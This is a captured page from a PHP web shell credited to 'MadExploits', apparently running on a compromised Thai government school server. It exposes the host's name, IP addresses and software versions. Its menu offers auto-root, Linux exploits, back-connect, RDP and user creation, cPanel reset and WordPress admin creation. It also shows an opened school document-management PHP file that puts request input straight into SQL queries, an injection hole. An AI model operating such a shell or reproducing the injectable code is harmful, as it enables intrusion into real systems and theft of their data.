Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
book /
bookschool /
[ HOME SHELL ]
Name
Size
Permission
Action
bookdetail_receive_saraban.php
12.16
KB
-rw-r--r--
livesearch_4.php
606
B
-rw-r--r--
receive.php
14.75
KB
-rw-r--r--
receive_file.php
2.05
KB
-rw-r--r--
register_receive.php
4.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bookdetail_receive_saraban.php
<?php session_start(); if(!(isset($_SESSION['bookarea_user_office']) and isset($_SESSION['bookarea_user_id']))){ echo "<div align='center'><br>"; echo "SESSION ERROR"; echo "</div>"; exit(); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> <!-- .style1 { font-size: 12px; } --> </style> <script> function registerDel(register_num,year,school_code) { if (register_num == "") { document.getElementById("txtHint").innerHTML = ""; return; } else { if (window.XMLHttpRequest) { xmlhttp = new XMLHttpRequest(); } else { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("txtHint").innerHTML = this.responseText; document.getElementById("register_del").style.display="none"; } }; xmlhttp.open("GET","livesearch_4.php?register_num="+register_num+"&year="+year+"&school_code="+school_code,true); xmlhttp.send(); } } </script> </head> <body> <?php date_default_timezone_set('Asia/Bangkok'); require_once "../../../amssplus_connect.php"; require_once("../../../mainfile.php"); require_once("../time_inc.php"); $sql = mysqli_query($connect,"SELECT * FROM book_main WHERE ms_id ='$_REQUEST[b_id]' ") ; $row2= mysqli_fetch_array($sql) ; $id = $row2['ms_id']; $ref_id = $row2['ref_id']; $level = $row2['level']; $bookno = $row2['bookno']; $signdate = $row2['signdate']; $subject = $row2['subject']; $ref_id = $row2['ref_id']; $rec_date = $row2['send_date']; $detail = $row2['detail']; $detail = nl2br($detail) ; $send_date=thai_date_4($rec_date); $signdate=thai_date_3($signdate); //หาหน่วยงานผู้ส่ง $sql_sender = mysqli_query($connect,"SELECT * FROM system_workgroup WHERE workgroup='$row2[office]' ") ; $row_sender= mysqli_fetch_array($sql_sender) ; if($row_sender){ $sender=$row_sender['workgroup_desc']; //หาชื่อผู้ส่ง $sql_name = mysqli_query($connect,"SELECT * FROM person_main WHERE person_id='$row2[sender]'"); $row_name= mysqli_fetch_array($sql_name) ; } else { $sql_sender = mysqli_query($connect,"SELECT * FROM system_school WHERE school_code='$row2[office]' ") ; $row_sender= mysqli_fetch_array($sql_sender) ; $sender=$row_sender['school_name']; //หาชื่อผู้ส่ง $sql_name = mysqli_query($connect,"SELECT * FROM person_sch_main WHERE person_id='$row2[sender]'"); $row_name= mysqli_fetch_array($sql_name) ; } // saraban answer $sql_answer = mysqli_query($connect,"SELECT id FROM book_sendto_answer WHERE ref_id ='$ref_id' and send_to='$_SESSION[bookarea_user_office]' and answer is null") ; $ans_num = mysqli_num_rows ($sql_answer) ; if ($ans_num>0) { $day_now=date("Y-m-d H:i:s"); $sql_answer = mysqli_query($connect,"update book_sendto_answer set answer='1', answer_time='$day_now' where ref_id='$ref_id' and send_to='$_SESSION[bookarea_user_office]'") ; //ส่วนการบันทึกทะเบียนรับส่งหนังสือราชการ $sql_check_bookregister = mysqli_query($connect,"SELECT * FROM bookregister_year WHERE school_code='$_SESSION[bookarea_user_office]' and year_active='1' and start_receive_num!='0' ") ; if($result_start=mysqli_fetch_array($sql_check_bookregister)){ //เลขทะเบียน $sql_number="select max(register_number) as number_max from bookregister_receive_sch where year='$result_start[year]' and school_code='$_SESSION[bookarea_user_office]' "; $query_number=mysqli_query($connect,$sql_number); $result_number=mysqli_fetch_array($query_number); if($result_number['number_max']<$result_start['start_receive_num']){ $register_number=$result_start['start_receive_num']; } else{ $register_number=$result_number['number_max']+1; } if($row2['secret']==1){ $secret=1; } else{ $secret=0; } if($row2['bookregis_link']==1){ $bookregis_link=1; } else { $bookregis_link=0; } //หาชื่อโรงเรียน $sql_schoolname = mysqli_query($connect,"SELECT * FROM system_school WHERE school_code='$_SESSION[bookarea_user_office]'") ; $row_schoolname= mysqli_fetch_array($sql_schoolname) ; $school_name=$row_schoolname['school_name']; $sql = "insert into bookregister_receive_sch(school_code, year, register_number, book_no, signdate, book_from, book_to, subject, register_date, ref_id, officer, book_link, secret) values ('$_SESSION[bookarea_user_office]', '$result_start[year]', '$register_number', '$bookno', '$row2[signdate]', '$sender', '$school_name', '$subject', '$day_now', '$ref_id', '$user', '$bookregis_link', '$secret')"; $dbquery = mysqli_query($connect,$sql); } //end บันทึกทะเบียนรับ } //select เลขทะเบียนหนังสือรับ $query_register_num=mysqli_query($connect,"select register_number from bookregister_receive_sch where ref_id='$ref_id' "); $result_register_num= mysqli_fetch_array($query_register_num) ; // img of level if ($level==1) { $img_level = "<IMG SRC=\"../images/level1.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ปกติ\"> <FONT SIZE=\"2\" COLOR=>ปกติ</FONT>" ; }else if ($level==2) { $img_level = "<IMG SRC=\"../images/level2.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ด่วน\"> <FONT SIZE=\"2\" COLOR=>ด่วน</FONT>" ; }else if ($level==3) { $img_level = "<IMG SRC=\"../images/level3.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ด่วนมาก\"> <FONT SIZE=\"2\" COLOR=>ด่วนมาก</FONT>" ; }else if ($level==4) { $img_level = "<IMG SRC=\"../images/level4.gif\" WIDTH=\"20\" HEIGHT=\"11\" BORDER=\"0\" ALT=\"ด่วนที่สุด\"> <FONT SIZE=\"2\" COLOR=>ด่วนที่สุด</FONT>" ; } ?> <div align="center"> <table border="0" width="480" id="table1" style="border-collapse: collapse; border: 1px dotted #FF00FF; ; padding-left:4px; padding-right:4px; padding-top:1px; padding-bottom:1px" cellpadding="2" > <tr> <td bgcolor="#003399" colspan="2" style="border: 1px dotted #808000"><font color="#FFFFFF"> <span lang="en-us"><font size="2"> </font></span><font size="2">รายละเอียดหนังสือ <?php echo $bookno;?></font></font></td> </tr> <tr> <td width="449" align="right" colspan="2" style="border: 1px dotted #808000"> <p align="left"><font size="2"> เรื่อง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $subject;?></FONT> [<?php echo $img_level;?>] </td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> เลขทะเบียนหนังสือรับ : </font> <FONT SIZE="2" COLOR="#CC3300"><span id="txtHint"><?php echo $result_register_num['register_number']; ?></span></font> <?php //ส่วนให้สามารถลบเลขหนังสือรับจากทะเบียนหนังสือราชการได้ //เช็คทะเบียนหนังสือรับ $sql_check_bookregister_2 = mysqli_query($connect,"SELECT * FROM bookregister_year WHERE school_code='$_SESSION[bookarea_user_office]' and year_active='1' and start_receive_num!='0' ") ; if($result_start_2=mysqli_fetch_array($sql_check_bookregister_2)){ //เลขทะเบียน $sql_number_2="select max(register_number) as number_max from bookregister_receive_sch where year='$result_start_2[year]' and school_code='$_SESSION[bookarea_user_office]' "; $query_number_2=mysqli_query($connect,$sql_number_2); $result_number_2=mysqli_fetch_array($query_number_2); if($result_register_num['register_number']==$result_number_2['number_max']){ echo " <font size='2'><span id='register_del'><a href='#' onclick='registerDel($result_register_num[register_number],$result_start_2[year],$_SESSION[bookarea_user_office])'>[ลบการลงทะเบียนหนังสือรับ]</a></span></font>"; } } ?> </td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> หนังสือลงวันที่ : </font> <FONT SIZE="2" COLOR="#CC3300"><?php echo $signdate;?></font></td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> ส่งโดย : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $sender;?> [<?php echo $row_name['name'];?> <?php echo $row_name['surname'];?>]</font></td> </tr> <tr> <td width="449" align="left" colspan="2" style="border: 1px dotted #808000"> <font size="2"> วันเวลาที่ส่ง : </font><FONT SIZE="2" COLOR="#CC3300"><?php echo $send_date;?></font> </td> </tr> <tr> <td width="85" align="left" style="border: 1px dotted #808000"><font size="2"> เนื้อหาโดยสรุป</font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table2" style="border-collapse: collapse" bordercolor="#808000" cellspacing="2" cellpadding="2"> <tr> <td align="left"><FONT SIZE="2" align="left"><?php echo $detail;?></FONT></td> </tr> </table> </div> </td> </tr> <tr> <td align="left" style="border: 1px dotted #808000"><font size="2"> ไฟล์แนบ </font></td> <td width="377" align="left" style="border: 1px dotted #808000"> <div align="center"> <table border="1" width="95%" id="table3" style="border-collapse: collapse" bordercolor=#669999 cellspacing="2" cellpadding="2"> <?php // check file attach if($row2['bookregis_link']==0){ $sql_file = mysqli_query($connect,"SELECT * FROM book_filebook WHERE ref_id = '$ref_id' ") ; $road="../upload_files/"; } else if($row2['bookregis_link']==1 and $row2['book_type']==1){ $sql_file = mysqli_query($connect,"SELECT * FROM bookregister_send_filebook WHERE ref_id='$ref_id' ") ; $road="../../bookregister/upload_files2/"; } else if($row2['bookregis_link']==1 and $row2['book_type']==2){ $sql_file = mysqli_query($connect,"SELECT * FROM bookregister_send_filebook_sch WHERE ref_id='$ref_id' ") ; $road="../../bookregister/upload_files2/"; } $file_num = mysqli_num_rows ($sql_file) ; if ($file_num<> 0) { $list = 1 ; while ($list<= $file_num&&$row= mysqli_fetch_array($sql_file)) { $file_name = $row ['file_name'] ; $file_des = $row ['file_des'] ; //xx if($row2['secret']==1){ ?> <tr> <td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></td> </tr> <?php } else{ ?> <tr> <td align="left"> <FONT SIZE="2"><?php echo $list;?>. </FONT><A HREF="../upload_files/<?php echo $road.$file_name;?>" title="คลิกเพื่อเปิดไฟล์แนบลำดับที่ <?php echo $list;?>" target="_BLANK"><FONT SIZE="2"><span style="text-decoration: none"><?php echo $file_des;?></span></FONT></A></td> </tr> <?php } //endxx $list ++ ; } }else { ?> <tr> <td> <FONT SIZE="2" COLOR="#CC3300"> ไม่มีไฟล์แนบ</FONT></td> </tr> <?php } ?> </table> </div> </td> </tr> <tr><td colspan="2"> <br /> <CENTER><input border="0" src="../images/button95.jpg" name="I1" width="100" height="20" type="image" onClick="javascript:window.close()"></CENTER> </td></tr> </table> </div> </body> </html>
Close
